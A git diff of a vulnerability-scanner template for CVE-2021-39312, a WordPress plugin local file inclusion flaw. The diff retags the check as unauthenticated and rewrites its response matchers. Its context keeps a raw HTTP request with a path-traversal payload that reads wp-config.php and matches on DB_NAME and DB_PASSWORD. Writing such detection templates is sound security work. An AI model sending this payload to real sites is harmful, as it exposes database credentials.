diff --git a/cves/2021/CVE-2021-39312.yaml b/cves/2021/CVE-2021-39312.yaml
index 6e2b58b2f2..9d22d84876 100644
--- a/cves/2021/CVE-2021-39312.yaml
+++ b/cves/2021/CVE-2021-39312.yaml
@@ -9,7 +9,7 @@ info:
   reference:
     - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
     - https://nvd.nist.gov/vuln/detail/CVE-2021-39312
-  tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr
+  tags: lfi,wp,wordpress,wp-plugin,unauth,lfr,cve,cve2021
 
 requests:
   - raw:
@@ -20,19 +20,15 @@ requests:
         Cookie: wordpress_test_cookie=WP%20Cookie%20check
 
         src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
-    cookie-reuse: true
+
     matchers-condition: and
     matchers:
-      - type: regex
-        regex:
+      - type: word
+        part: body
+        words:
           - "DB_NAME"
           - "DB_PASSWORD"
-        part: body
-
-      - type: word
-        part: header
-        words:
-          - 'text/html'
+        condition: and
 
       - type: status
         status: